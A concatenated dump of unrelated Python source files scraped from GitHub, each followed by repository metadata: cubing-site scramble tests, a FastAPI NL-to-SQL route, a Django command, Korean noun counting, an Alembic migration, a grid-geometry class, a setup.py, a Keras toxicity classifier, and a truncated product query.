from cubersio.util.events.resources import EVENT_3x3, EVENT_10x10, EVENT_COLL, EVENT_FTO, EVENT_REX
# Put Huey in immediate mode so the tasks execute synchronously
huey.immediate = True
def _setup_mock(**kwargs):
""" Utility function for setting up a mocked Event or EventDefinition. Need to use Mock::configure because Events
and EventDefinitions have a `name` attribute which we need to override, and `name` is usually a special reserved
attribute for Mock. """
mock_event = Mock()
mock_event.configure_mock(**kwargs)
return mock_event
@patch('cubersio.tasks.scramble_generation.get_all_events')
@patch('cubersio.tasks.scramble_generation.top_off_scramble_pool')
def test_check_scramble_pool(mock_top_off_scramble_pool, mock_get_all_events):
""" Test that the scrambler pool checker task makes the appropriate calls to top_off_scramble_pool based on the
number of remaining scrambles for each event. """
# 3x3 and FTO need scrambles, they are below the 2x weekly scrambles threshold.
# 10x10 has enough scrambles, and COLL doesn't have its scrambles pre-generated.
mock_get_all_events.return_value = [
_setup_mock(name=EVENT_3x3.name, id=1, scramble_pool=list(range(5)), totalSolves=5),
_setup_mock(name=EVENT_10x10.name, id=2, scramble_pool=list(range(5)), totalSolves=1),
_setup_mock(name=EVENT_COLL.name, id=3, scramble_pool=list(range(5)), totalSolves=5),
_setup_mock(name=EVENT_FTO.name, id=4, scramble_pool=list(), totalSolves=5),
]
check_scramble_pool()
mock_get_all_events.assert_called_once()
assert mock_top_off_scramble_pool.call_count == 2
mock_top_off_scramble_pool.assert_has_calls([
call(ScramblePoolTopOffInfo(1, EVENT_3x3.name, 5)),
call(ScramblePoolTopOffInfo(4, EVENT_FTO.name, 10))
])
@pytest.mark.parametrize('top_off_info', [
ScramblePoolTopOffInfo(event_id=10, event_name=EVENT_REX.name, num_scrambles=5),
ScramblePoolTopOffInfo(event_id=42, event_name=EVENT_FTO.name, num_scrambles=15),
])
@patch('cubersio.tasks.scramble_generation.add_scramble_to_scramble_pool')
@patch('cubersio.tasks.scramble_generation.get_event_definition_for_name')
def test_top_off_scramble_pool_multi_scramble_puzzles(mock_get_event_definition_for_name,
mock_add_scramble_to_scramble_pool,
top_off_info: ScramblePoolTopOffInfo):
""" Test that top_off_scramble_pool calls the event resource scrambler correctly for those events where scrambles
are generated in bulk because it's faster. """
scrambles = list(range(top_off_info.num_scrambles))
mock_event_def = _setup_mock(name=top_off_info.event_name)
mock_event_def.get_multiple_scrambles.return_value = scrambles
mock_get_event_definition_for_name.return_value = mock_event_def
top_off_scramble_pool(top_off_info)
mock_get_event_definition_for_name.assert_called_once_with(top_off_info.event_name)
mock_event_def.get_multiple_scrambles.assert_called_once_with(top_off_info.num_scrambles)
assert mock_add_scramble_to_scramble_pool.call_count == top_off_info.num_scrambles
expected_calls = [call(scramble, top_off_info.event_id) for scramble in scrambles]
mock_add_scramble_to_scramble_pool.assert_has_calls(expected_calls)
@patch('cubersio.tasks.scramble_generation.add_scramble_to_scramble_pool')
@patch('cubersio.tasks.scramble_generation.get_event_definition_for_name')
def test_top_off_scramble_pool_single_scramble_puzzles(mock_get_event_definition_for_name,
mock_add_scramble_to_scramble_pool):
""" Test that top_off_scramble_pool calls the event resource scrambler correctly for those events where scrambles
are generated one at a time. """
top_off_info = ScramblePoolTopOffInfo(event_id=11, event_name=EVENT_3x3.name, num_scrambles=5)
scrambles = list(range(top_off_info.num_scrambles))
mock_event_def = _setup_mock(name=top_off_info.event_name)
mock_event_def.get_scramble.side_effect = scrambles
mock_get_event_definition_for_name.return_value = mock_event_def
top_off_scramble_pool(top_off_info)
mock_get_event_definition_for_name.assert_called_once_with(top_off_info.event_name)
assert mock_event_def.get_scramble.call_count == top_off_info.num_scrambles
assert mock_add_scramble_to_scramble_pool.call_count == top_off_info.num_scrambles
expected_calls = [call(scramble, top_off_info.event_id) for scramble in scrambles]
mock_add_scramble_to_scramble_pool.assert_has_calls(expected_calls)
@patch('cubersio.tasks.scramble_generation.get_event_definition_for_name')
def test_top_off_scramble_pool_raises_for_nonexistent_event(mock_get_event_definition_for_name):
""" Test that top_off_scramble_pool raises RuntimeError for a bogus event. """
mock_get_event_definition_for_name.return_value = None
with pytest.raises(TaskException) as te:
top_off_scramble_pool(ScramblePoolTopOffInfo(event_id=1, event_name="blah", num_scrambles=5)).get()
assert f"Can't find an EventResource for event blah" in te.value.metadata['error']
| euphwes/cubers.io | tst/tasks/test_scramble_generation.py | test_scramble_generation.py | py | 5,529 | python | en | code | 27 | github-code | 36 | [
{
"api_name": "cubersio.tasks.huey.immediate",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "cubersio.tasks.huey",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "unittest.mock.Mock",
"line_number": 21,
"usage_type": "call"
},
{
"api_nam... |
23988137844 | from fastapi import APIRouter
import traceback
from .nl_to_sql_utils import get_similar_severities, get_most_relevant_severity, get_sql_query
from .nl_to_sql_prompts import tables_info
from pydantic import BaseModel
router = APIRouter()
class NLtoSQL(BaseModel):
    """Request body for the /nl_to_sql endpoint."""
    # Natural-language question to translate into SQL.
    query: str
@router.post("/nl_to_sql")
async def nl_to_sql(body: NLtoSQL):
"""
Args:
query (str): user query for which we want to find attack techniques
Returns:
json object with following fields
query(str),
most_relevant_severity(str),
sql_query(str)
"""
try:
query = body.query
similar_severities = get_similar_severities(query)
inputs = {
"user_query":query,
"severities":similar_severities
}
most_relevant_severity = await get_most_relevant_severity(inputs)
inputs = {
"tables_info":tables_info,
"severity_value":most_relevant_severity
}
sql_query = await get_sql_query(inputs)
return {
"query": query,
"most_relevant_severity": most_relevant_severity,
"sql_query": sql_query
}
except Exception as e:
traceback.print_exc() | yadneshSalvi/cybersec_genai | src/nl_to_sql/nl_to_sql_routes.py | nl_to_sql_routes.py | py | 1,288 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fastapi.APIRouter",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "pydantic.BaseModel",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "nl_to_sql_utils.get_similar_severities",
"line_number": 27,
"usage_type": "call"
},
{
"api_nam... |
14566383158 | from django.core.management.base import BaseCommand
from depot.models import SiteBookPublish
class Command(BaseCommand):
    """Management command: publish every pending SiteBookPublish entry,
    oldest first."""

    def handle(self, **options):
        pending = SiteBookPublish.objects.filter(status=0).order_by('created_at')
        for publication in pending:
            print(publication.id, publication.site_book, publication.created_at)
            publication.publish()
| fnp/redakcja | src/depot/management/commands/depot.py | depot.py | py | 314 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "depot.models.SiteBookPublish.objects.filter",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "depot.models.SiteBookPublish.objects",
"line_number": 7,
... |
71521743464 | from konlpy.tag import Okt
# 오픈 소스 한국어 분석기
# 속도는 느리지만, 정규화에 매우 좋음
from collections import Counter
def NLP(text):
    """Extract the two most frequent nouns (length >= 2) from Korean ``text``.

    Uses the Okt morphological analyzer from KoNLPy. Prints the noun list and
    frequency table as a side effect.

    Returns:
        str: the top two nouns joined by a space, or the single top noun when
        only one qualifies.

    Raises:
        ValueError: if no noun of length >= 2 is found.
    """
    # Okt 형태소 분석기 객체 생성
    okt = Okt()
    # BUGFIX: the original popped from ``nouns`` while enumerating it, which
    # skips the element after every removal and shifts later indices; build a
    # filtered list instead.
    nouns = [noun for noun in okt.nouns(text) if len(noun) >= 2]
    print(nouns)
    # 명사 빈도 카운트 (noun frequencies, most common first)
    count = Counter(nouns)
    noun_list = count.most_common(100)
    for v in noun_list:
        print(v)
    if not noun_list:
        raise ValueError("no nouns of length >= 2 found in the input text")
    print("가장 높은 빈도 수의 단어 : ")
    print(noun_list[0])
    if len(noun_list) < 2:
        # Only one qualifying noun: the original crashed here with an
        # IndexError; return the single noun instead.
        return noun_list[0][0]
    print("두 번째로 높은 빈도 수의 단어 : ")
    print(noun_list[1])
    print("두 단어를 합치기 : ")
    nouns_list = noun_list[0][0] + ' ' + noun_list[1][0]
    print(nouns_list)
    return nouns_list
#text=input()
#NLP(text)
| Junst/KoNLPy-tTV | KoNLPy/KoNLPy_Okt.py | KoNLPy_Okt.py | py | 1,218 | python | ko | code | 0 | github-code | 36 | [
{
"api_name": "konlpy.tag.Okt",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "collections.Counter",
"line_number": 25,
"usage_type": "call"
}
] |
70955299304 | """add unique constraint to solve for scramble and event results
Revision ID: 5de7c9b4e68c
Revises: 66f166a908a4
Create Date: 2019-10-13 13:11:53.915868
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '5de7c9b4e68c'
down_revision = '66f166a908a4'
branch_labels = None
depends_on = None
def upgrade():
    """Apply: enforce one solve row per (scramble, user event results) pair.

    batch_alter_table is used so the change also works on SQLite, which
    cannot add a constraint via plain ALTER TABLE.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    with op.batch_alter_table('user_solves', schema=None) as batch_op:
        batch_op.create_unique_constraint('unique_scramble_user_results', ['scramble_id', 'user_event_results_id'])
    # ### end Alembic commands ###
def downgrade():
    """Revert: drop the unique constraint added by upgrade()."""
    # ### commands auto generated by Alembic - please adjust! ###
    with op.batch_alter_table('user_solves', schema=None) as batch_op:
        batch_op.drop_constraint('unique_scramble_user_results', type_='unique')
    # ### end Alembic commands ###
| euphwes/cubers.io | migrations/versions/039_5de7c9b4e68c_add_unique_constraint_to_solve_for_.py | 039_5de7c9b4e68c_add_unique_constraint_to_solve_for_.py | py | 924 | python | en | code | 27 | github-code | 36 | [
{
"api_name": "alembic.op.batch_alter_table",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "alembic.op.batch_alter_table",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "... |
74267279783 | import requests
import time
TIMEOUT: int = 1
ATTEMPTS: int = 3
def _get_base_headers() -> dict:
"""Get base header for request."""
return {"Content-Type": "application/json"}
def _get(url: str, headers: dict, params: dict) -> requests.Response:
    """GET ``url``, retrying up to ATTEMPTS times on a timeout.

    Sleeps 0.5 s after each timed-out attempt and re-raises Timeout once
    every attempt has failed.
    """
    attempt = 0
    while attempt < ATTEMPTS:
        try:
            return requests.get(url, headers=headers, params=params, timeout=TIMEOUT)
        except requests.exceptions.Timeout:
            time.sleep(0.5)
            attempt += 1
    raise requests.exceptions.Timeout
def get(url: str, **kwargs) -> dict:
    """Send a GET request to the server and return the decoded JSON body.

    Keyword args:
        headers: extra headers merged over the base headers.
        params: query-string parameters.

    Raises:
        requests.exceptions.Timeout: when every retry attempt times out.
        requests.exceptions.HTTPError: on a non-2xx response status.
    """
    headers: dict = _get_base_headers()
    headers.update(kwargs.get("headers", {}))
    params: dict = kwargs.get("params", {})
    # CONSISTENCY FIX: route through the module's retrying _get helper; the
    # original called requests.get directly, leaving the retry logic unused.
    response = _get(url, headers, params)
    response.raise_for_status()
    return response.json()
| gordienko-dmitry/job_analyzer | api/server.py | server.py | py | 961 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "requests.Response",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "requests.get",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "requests.exceptions",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "time.sle... |
15509801064 | import numpy as np
import geopandas
import shapely
class SparseGrid:
def __init__(self, x_lim, y_lim, n_cols=10, n_rows=10, tag_prefix = ''):
'''
General class to define a spatial frame composed of regular polygons,
based on a grid of size n_cols x n_rows
:param x_lim: Minimum and Maximum values in the horizontal axis.
Tupple of floats.
:param y_lim: Minimum and Maximum values in the vertical axis.
Tupple of floats.
:param n_cols: Number of columns in which the horizontal axis is divided.
Integer.
:param n_rows: Number of columns in which the vertical axis is divided.
Integer
:param tag_prefix: Prefix to use as id of the polygons in the grid.
String.
'''
assert len(x_lim) == 2 and np.diff(x_lim) > 0
assert len(y_lim) == 2 and np.diff(y_lim) > 0
assert isinstance(n_cols, int) and n_cols > 0
assert isinstance(n_rows, int) and n_cols > 0
assert isinstance(tag_prefix, str)
self.x_lim = x_lim
self.y_lim = y_lim
self.dx = (x_lim[1] - x_lim[0]) / n_cols
self.dy = (y_lim[1] - y_lim[0]) / n_rows
self.x_grid = np.linspace(x_lim[0], x_lim[1] - self.dx, n_cols)
self.y_grid = np.linspace(y_lim[0], y_lim[1] - self.dy, n_rows)
self.n_cols = n_cols
self.n_rows = n_rows
n_cells = self.n_cols * self.n_rows
id_size = len(str(n_cells - 1))
self.tag_prefix = tag_prefix
self.tags = [self.tag_prefix + '0' * (id_size - len(str(f'{i}'))) + f'{i}' for i in range(n_cols * n_rows) ]
self.sparse_frame = geopandas.GeoDataFrame({'id' :[], 'geometry' :None})
def get_row(self, y):
'''
Get the row in the grid to which a value y corresponds
:param y: Coordinate in the vertical axis
Float
:return: Row number
Integer
'''
if y >= self.y_lim[0] or y <= self.y_lim[1]:
return sum(self.y_grid <= y) - 1
def get_col(self, x):
'''
Get the column in the grid to which a value x corresponds
:param x: Coordinate in the horizontal axis
Float
:return: Column number
Integer
'''
if x >= self.x_lim[0] or x <= self.x_lim[1]:
return sum(self.x_grid <= x) - 1
def tag_from_ij(self, i, j):
'''
Get the tag (or id) of a polygon based on its location within the grid
:param i: Column number within the grid
Integer
:param j: Row number within the grid
Integer
:return: Tag
String
'''
ij = str(j * self.n_cols + i)
return self.tag_prefix + '0' * (len(str(self.n_cols * self.n_rows)) - len(ij)) + ij
def tag_from_xy(self, x, y):
'''
Get the tag (or id) of a polygon based on a pair of coordinates located within it
:param x: Coordinate in the horizontal axis
Float
:param y: Coordinate in the vertical axis
Float
:return: Tag
String
'''
nx = self.get_col(x)
ny = self.get_row(y)
if nx is not None and ny is not None:
return self.tag_from_ij(nx, ny)
def ij_from_tag(self, tag):
'''
Get the location of a polygon within the grid based on its tag (or id)
:param tag: id of a polygon
String
:return: Location (i, j) of a polygon
Tuple of integers
'''
ix = self.tags.index(tag)
ny = ix // self.n_cols
nx = ix % self.n_cols
return nx, ny
def add_polygon_from_tag(self, tag):
'''
Incorporate a polygon to the sparse_grid GeoDataFrame
:param tag: id of a polygon
String
'''
if tag not in self.sparse_frame.id.tolist():
nx, ny = self.ij_from_tag(tag)
x0 = self.x_lim[0] + nx * self.dx
y0 = self.y_lim[0] + ny * self.dy
sq = [(x0, y0), (x0, y0 + self.dy), (x0 + self.dx, y0 + self.dy), (x0 + self.dx, y0)]
ngeo = geopandas.GeoDataFrame({'id': [tag],
'geometry': shapely.geometry.Polygon(sq)})
self.sparse_frame = self.sparse_frame.append(ngeo)
self.sparse_frame.reset_index(inplace=True, drop=True)
def add_polygon_from_xy(self, X):
    '''
    Incorporate a polygon to the sparse_grid GeoDataFrame.

    :param X: Points within the grid.
              Numpy array of dimensions (n, 2)
    '''
    assert isinstance(X, np.ndarray)
    assert X.shape[1] == 2
    # Register the containing grid cell of every point, one at a time.
    for point in X:
        self.add_polygon_from_tag(self.tag_from_xy(point[0], point[1]))
def get_simplified(self, tolerance=1e-4):
    '''
    Simplify adjacent polygons in sparse_grid.

    :param tolerance: Points in a simplified geometry will be no more than `tolerance` distance from the original.
                      (see geopandas.GeoDataFrame.simplify).
                      float
    :return: Simplified polygons object.
             GeoDataFrame
    '''
    assert tolerance > 0
    # NOTE(review): shapely.geometry.multipolygon.asMultiPolygon builds an
    # adapter over the stored polygons; it was deprecated and removed in
    # Shapely 2.0 (the MultiPolygon constructor is the replacement) --
    # confirm the pinned Shapely version before upgrading.
    mpolyg = shapely.geometry.multipolygon.asMultiPolygon(self.sparse_frame.geometry)
    # preserve_topology=False uses the faster Douglas-Peucker variant; it may
    # merge or drop geometries while dissolving shared cell edges.
    mpolyg = mpolyg.simplify(tolerance=tolerance, preserve_topology=False)
return geopandas.GeoDataFrame({'id': list(range(len(mpolyg))), 'geometry': mpolyg}) | disarm-platform/disarm-gears | disarm_gears/frames/sparse_grid.py | sparse_grid.py | py | 5,682 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.diff",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.diff",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "numpy.linspace",
"line_numbe... |
14114323371 | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="mktable2matrix",
version="0.1.2",
author="Guilherme Lucas",
author_email="guilherme.slucas@gmail.com",
description="Converts markdown table to Matrix",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/Guilhermeslucas/mktable2matrix",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
) | Guilhermeslucas/mktable2matrix | setup.py | setup.py | py | 646 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "setuptools.setup",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "setuptools.find_packages",
"line_number": 16,
"usage_type": "call"
}
] |
73895270183 | '''
Author: airscker
Date: 2022-09-21 18:43:31
LastEditors: airscker
LastEditTime: 2023-08-31 12:23:45
Description: NULL
Copyright (C) 2023 by Airscker(Yufeng), All Rights Reserved.
'''
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
import pathlib
import os
here = pathlib.Path(__file__).parent.resolve()
# Get the long description from the README file
long_description = (here / "./README.md").read_text(encoding="utf-8")
version = {}
with open(os.path.join("DeepMuon", "__version__.py")) as f:
exec(f.read(), version)
setup(
name="DeepMuon",
version=version['__version__'],
description="Interdisciplinary Deep Learning Platform",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://airscker.github.io/DeepMuon/",
author="Airscker/Yufeng Wang",
author_email="airscker@gmail.com",
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Topic :: Software Development :: Build Tools",
"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3 :: Only",
],
keywords="Deep Learning, Searching Dark Matter, Direct and Simple",
# When your source code is in a subdirectory under the project root, e.g.
# `src/`, it is necessary to specify the `package_dir` argument.
# package_dir={"": "DeepMuon"}, # Optional
# You can just specify package directories manually here if your project is
# simple. Or you can use find_packages().
#
# Alternatively, if you just want to distribute a single Python file, use
# the `py_modules` argument instead as follows, which will expect a file
# called `my_module.py` to exist:
#
# py_modules=["my_module"],
#
packages=find_packages(), # Required
# Specify which Python versions you support. In contrast to the
# 'Programming Language' classifiers above, 'pip install' will check this
# and refuse to install the project if the version does not match. See
# https://packaging.python.org/guides/distributing-packages-using-setuptools/#python-requires
python_requires=">=3.6, <4",
# This field lists other packages that your project depends on to run.
# Any package you put here will be installed by pip when your project is
# installed, so they must be valid existing projects.
#
# For an analysis of "install_requires" vs pip's requirements files see:
# https://packaging.python.org/discussions/install-requires-vs-requirements/
install_requires=['click',
'prettytable',
'opencv-python',
'tqdm',
'numpy',
'pandas',
'openpyxl',
'ptflops',
'torchinfo',
'captum',
'monai',
'pynvml',
'psutil',
'GPUtil',
'matplotlib',
'timm',
'SimpleITK',
'scikit-learn',
'scikit-image',
'tensorboard',
'yapf',
'parso',
'rdkit',
'seaborn'
],
# Similar to `install_requires` above, these must be valid existing
# projects.
# extras_require={ # Optional
# "dev": ["check-manifest"],
# "test": ["coverage"],
# },
# If there are data files included in your packages that need to be
# installed, specify them here.
# package_data={ # Optional
# "sample": ["package_data.dat"],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/distutils/setupscript.html#installing-additional-files
#
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[("Tutorial", ["Tutorial/*"],'Resources',['Resources/*'])], # Optional
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# `pip` to create the appropriate form of executable for the target
# platform.
#
# For example, the following would provide a command called `sample` which
# executes the function `main` from this package when invoked:
entry_points={ # Optional
"console_scripts": [
"Dmuon_train=DeepMuon.train.run:main",
# "Dmuon_infer=DeepMuon.test.inference:run",
# 'Dmuon_ana=DeepMuon.test.analysis:run',
# 'Dmuon_com=DeepMuon.test.compare:run',
],
},
# List additional URLs that are relevant to your project as a dict.
#
# This field corresponds to the "Project-URL" metadata fields:
# https://packaging.python.org/specifications/core-metadata/#project-url-multiple-use
#
# Examples listed include a pattern for specifying where the package tracks
# issues, where the source is hosted, where to say thanks to the package
# maintainers, and where to support the project financially. The key is
# what's used to render the link text on PyPI.
# project_urls={ # Optional
# "Bug Reports": "https://github.com/pypa/sampleproject/issues",
# "Funding": "https://donate.pypi.org",
# "Say Thanks!": "http://saythanks.io/to/example",
# "Source": "https://github.com/pypa/sampleproject/",
# },
)
| Airscker/DeepMuon | setup.py | setup.py | py | 6,250 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "setuptools.setup",
"line_n... |
25597505663 | # Basic packages
import pandas as pd
import numpy as np
import re
import collections
# import matplotlib.pyplot as plt
from pathlib import Path
# Packages for data preparation
from sklearn.model_selection import train_test_split
from nltk.corpus import stopwords
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils.np_utils import to_categorical
from sklearn.preprocessing import LabelEncoder
# Packages for modeling
from keras import models
from keras import layers
from keras import regularizers
NB_WORDS = 10000 # Parameter indicating the number of words we'll put in the dictionary
VAL_SIZE = 1000 # Size of the validation set
NB_START_EPOCHS = 20 # Number of epochs we usually start to train with
BATCH_SIZE = 512 # Size of the batches used in the mini-batch gradient descent
MAX_LEN = 24 # Maximum number of words in a sequence
GLOVE_DIM = 50 # Number of dimensions of the GloVe word embeddings
INPUT_PATH = '../input' # Path where all input files are stored
root = Path('./')
input_path = root / 'input/'
ouput_path = root / 'output/'
source_path = root / 'source/'
def deep_model(model, X_train, y_train, X_valid, y_valid):
    '''
    Function to train a multi-class model. The number of epochs and
    batch_size are set by the constants at the top of the
    notebook.

    Parameters:
        model : model with the chosen architecture
        X_train : training features
        y_train : training target
        X_valid : validation features
        y_valid : validation target
    Output:
        model training history
    '''
    model.compile(optimizer='rmsprop'
                  , loss='categorical_crossentropy'
                  , metrics=['accuracy'])
    # Bug fix: the docstring promises the training history, but the fit result
    # used to be discarded so the function implicitly returned None (which is
    # why eval_metric(history, ...) could never have worked on the result).
    history = model.fit(X_train
                        , y_train
                        , epochs=NB_START_EPOCHS
                        , batch_size=BATCH_SIZE
                        , validation_data=(X_valid, y_valid)
                        , verbose=1)
    # Persist the trained weights.
    # NOTE(review): the output directory is hard-coded and must already
    # exist -- confirm ./output/model/ is created elsewhere in the pipeline.
    model.save("./output/model/model.h5")
    return history
def eval_metric(history, metric_name):
    '''
    Function to evaluate a trained model on a chosen metric.
    Training and validation metric are plotted in a
    line chart for each epoch.

    Parameters:
        history : model training history
        metric_name : loss or accuracy
    Output:
        line chart with epochs of x-axis and metric on
        y-axis
    '''
    # Per-epoch metric values recorded by Keras in history.history.
    metric = history.history[metric_name]
    val_metric = history.history['val_' + metric_name]
    e = range(1, NB_START_EPOCHS + 1)
    # NOTE(review): `plt` is undefined in this module -- the
    # `import matplotlib.pyplot as plt` line at the top of the file is
    # commented out, so calling this function raises NameError. Its only
    # call sites are themselves commented out; re-enable the import before
    # using this function.
    plt.plot(e, metric, 'bo', label='Train ' + metric_name)
    plt.plot(e, val_metric, 'b', label='Validation ' + metric_name)
    plt.legend()
    plt.show()
def test_model(model, X_train, y_train, X_test, y_test, epoch_stop):
    '''
    Retrain the model on the full training data for the optimal number of
    epochs, then score it on the held-out test set.

    Parameters:
        model : trained model
        X_train : training features
        y_train : training target
        X_test : test features
        y_test : test target
        epoch_stop : optimal number of epochs
    Output:
        test loss and accuracy as returned by model.evaluate
    '''
    model.fit(X_train,
              y_train,
              epochs=epoch_stop,
              batch_size=BATCH_SIZE,
              verbose=0)
    return model.evaluate(X_test, y_test)
def remove_stopwords(input_text):
    '''
    Remove English stopwords from a piece of text.

    Parameters:
        input_text : text to clean
    Output:
        cleaned text
    '''
    blocked = stopwords.words('english')
    # Negation words can carry sentiment, so they survive the filter.
    keep_anyway = ["n't", "not", "no"]
    kept = []
    for token in input_text.split():
        # Single-character tokens are always dropped.
        if len(token) <= 1:
            continue
        if token in blocked and token not in keep_anyway:
            continue
        kept.append(token)
    return " ".join(kept)
def remove_mentions(input_text):
    '''
    Strip Twitter-style mentions (an @ followed by word characters)
    from a piece of text.

    Parameters:
        input_text : text to clean
    Output:
        cleaned text
    '''
    mention_pattern = re.compile(r'@\w+')
    return mention_pattern.sub('', input_text)
df = pd.read_csv(input_path / 'train.csv')
df = df.reindex(np.random.permutation(df.index))
df = df[['comment_text', 'toxic']]
df.text = df.comment_text.apply(remove_stopwords).apply(remove_mentions)
X_train, X_test, y_train, y_test = train_test_split(df.comment_text, df.toxic, test_size=0.1, random_state=37)
print('# Train data samples:', X_train.shape[0])
print('# Test data samples:', X_test.shape[0])
assert X_train.shape[0] == y_train.shape[0]
assert X_test.shape[0] == y_test.shape[0]
tk = Tokenizer(num_words=NB_WORDS,
filters='!"#$%&()*+,-./:;<=>?@[\\]^_`{|}~\t\n',
lower=True,
split=" ")
tk.fit_on_texts(X_train)
X_train_seq = tk.texts_to_sequences(X_train)
X_test_seq = tk.texts_to_sequences(X_test)
seq_lengths = X_train.apply(lambda x: len(x.split(' ')))
seq_lengths.describe()
X_train_seq_trunc = pad_sequences(X_train_seq, maxlen=MAX_LEN)
X_test_seq_trunc = pad_sequences(X_test_seq, maxlen=MAX_LEN)
X_train_seq_trunc[10] # Example of padded sequence
le = LabelEncoder()
y_train_le = le.fit_transform(y_train)
y_test_le = le.transform(y_test)
y_train_oh = to_categorical(y_train_le)
y_test_oh = to_categorical(y_test_le)
X_train_emb, X_valid_emb, y_train_emb, y_valid_emb = train_test_split(X_train_seq_trunc, y_train_oh, test_size=0.1, random_state=37)
assert X_valid_emb.shape[0] == y_valid_emb.shape[0]
assert X_train_emb.shape[0] == y_train_emb.shape[0]
print('Shape of validation set:',X_valid_emb.shape)
glove_file = 'glove.twitter.27B.25d.txt'
glove_dir = 'glove/'
emb_dict = {}
glove = open(input_path / glove_dir / glove_file)
for line in glove:
values = line.split()
word = values[0]
vector = np.asarray(values[1:], dtype='float32')
emb_dict[word] = vector
glove.close()
airline_words = ['fuck', 'pussy', 'sad', 'hell']
for w in airline_words:
if w in emb_dict.keys():
print('Found the word {} in the dictionary'.format(w))
GLOVE_DIM = 25
emb_matrix = np.zeros((NB_WORDS, GLOVE_DIM))
for w, i in tk.word_index.items():
# The word_index contains a token for all words of the training data so we need to limit that
if i < NB_WORDS:
vect = emb_dict.get(w)
# Check if the word from the training data occurs in the GloVe word embeddings
# Otherwise the vector is kept with only zeros
if vect is not None:
emb_matrix[i] = vect
else:
break
from keras.layers import LSTM
lstm_out = 20
emb_model2 = models.Sequential()
emb_model2.add(layers.Embedding(NB_WORDS, GLOVE_DIM, input_length=MAX_LEN))
emb_model2.add(LSTM(lstm_out, dropout=0.2, recurrent_dropout=0.2))
emb_model2.add(layers.Dense(2, activation='softmax'))
emb_model2.summary()
emb_history2 = deep_model(emb_model2, X_train_emb, y_train_emb, X_valid_emb, y_valid_emb)
# embmodel.save("./lstm_model/model.h5")
# eval_metric(emb_history2, 'loss')
# eval_metric(emb_history2, 'acc')
emb_results2 = test_model(emb_model2, X_train_seq_trunc, y_train_oh, X_test_seq_trunc, y_test_oh, 3)
print('/n')
print('Test accuracy of word embedding model 2: {0:.2f}%'.format(emb_results2[1]*100))
twt = ["vagina"]
#vectorizing the tweet by the pre-fitted tokenizer instance
twt = tk.texts_to_sequences(twt)
#padding the tweet to have exactly the same shape as `embedding_2` input
twt = pad_sequences(twt, maxlen=24, dtype='int32', value=0)
print(twt)
sentiment = emb_model2.predict(twt,batch_size=1,verbose = 2)[0]
if(np.argmax(sentiment) == 0):
print("positive")
elif (np.argmax(sentiment) == 1):
print("negative")
| ntesh21/profanity-detection | train.py | train.py | py | 7,843 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwords.words",
"line_number": 127,
"usage_type": "call"
},
{
"api_name": "nltk.corpus.stopwords",
"line_number": 127,
"usage_type": "name"
},
{
"api_name": "re.s... |
35689287977 | from utils.database import db
from utils.database import Product as ProductDB, ProductSize as ProductSizes, ProductColor as ProductColors, SubCategories as SubCategoriesDB, Categories as CategoriesDB
def get_products(id:int=None, search_string:str=None, category_item:str=None, subcategory_item:str=None) -> list:
    """Fetch product rows from the DB as plain dicts.

    With no ``id``: return a summary dict for every product, optionally
    narrowed by a free-text search OR by an exact category/subcategory pair
    (the search filter wins when both are supplied). With an ``id``: return a
    single-element list holding the full detail record for that product.

    NOTE(review): the ``id`` parameter shadows the built-in ``id()``; renaming
    would change the keyword interface, so it is only flagged here.
    """
    products = []
    if id is None:
        # Get all products from db
        for product in db.session.query(ProductDB).all():
            # Resolve the category chain one row at a time (N+1 queries;
            # acceptable for small catalogs).
            subcategory = db.session.query(SubCategoriesDB).get(product.subcategory_id)
            subcategory_name = subcategory.name
            category = db.session.query(CategoriesDB).get(subcategory.category_id)
            category_name = category.name
